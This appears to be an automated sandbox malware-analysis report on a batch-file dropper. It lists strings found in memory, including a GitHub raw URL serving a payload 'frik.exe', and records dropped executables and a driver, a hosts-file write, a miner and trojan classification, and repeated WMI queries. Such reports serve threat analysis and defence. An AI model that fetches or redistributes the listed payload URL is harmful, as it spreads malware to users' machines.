            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: powershell.exe, 00000003.00000002.1542373154.000002570160E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
            Source: powershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.co
            Source: powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.cod
            Source: powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.coductVersion124
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.1542373154.000002570164A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.1542373154.0000025701347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: powershell.exe, 00000003.00000002.1564853812.000002576D6DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmp, 1348.exe, 00000006.00000002.1636734357.000002007EDD0000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000B.00000002.1624151013.0000024B91570000.00000004.00000020.00020000.00000000.sdmp, wusa.exe, 0000000E.00000002.1624513920.000002844E6D9000.00000004.00000020.00020000.00000000.sdmp, wusa.exe, 0000000E.00000002.1624575403.000002844E8C0000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000F.00000002.1625790130.0000017F0BD90000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000011.00000002.1626671311.00000166BE740000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.1628425902.000001EFDC190000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000015.00000002.1629566182.000001603B750000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000017.00000002.1631470448.0000029B1BBD0000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000019.00000002.1632666952.0000012BA8A10000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000001B.00000002.1644264384.00000271AB210000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000001C.00000002.1671409015.000001DA1CD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe
            Source: sc.exe, 0000001C.00000002.1671409015.000001DA1CD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP
            Source: wusa.exe, 0000000E.00000002.1624575403.000002844E8C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fruktoozik/qnfr/rawf
            Source: wusa.exe, 0000000E.00000002.1624513920.000002844E6D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fruktoozik/qnfr8P
            Source: powershell.exe, 00000003.00000002.1542373154.0000025700C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000003.00000002.1542373154.0000025701633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: powershell.exe, 00000003.00000002.1542373154.0000025701633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exe
            Source: 1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.drweb.ru/
            Source: 1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.kaspersky.ru/downloads/free-virus-removal-tool
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.9:49707 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Users\user\AppData\Local\Temp\1348.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1348.exeJump to dropped file
            Source: C:\Windows\System32\conhost.exeCode function: 47_2_0000000140001394 NtDelayExecution,47_2_0000000140001394
            Source: C:\ProgramData\Chrome.exeFile created: C:\Windows\TEMP\lhaqmlexwhjs.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_0smp4f3y.ej3.ps1
            Source: C:\Windows\System32\conhost.exeCode function: 47_2_000000014000324047_2_0000000140003240
            Source: C:\Windows\System32\conhost.exeCode function: 47_2_00000001400027D047_2_00000001400027D0
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\lhaqmlexwhjs.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: classification engineClassification label: mal100.troj.adwa.expl.evad.mine.winBAT@70/18@4/4
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:764:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6168:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3716:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2728:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5732:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4212:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzu3hwdv.fdf.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\explorer.exe
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
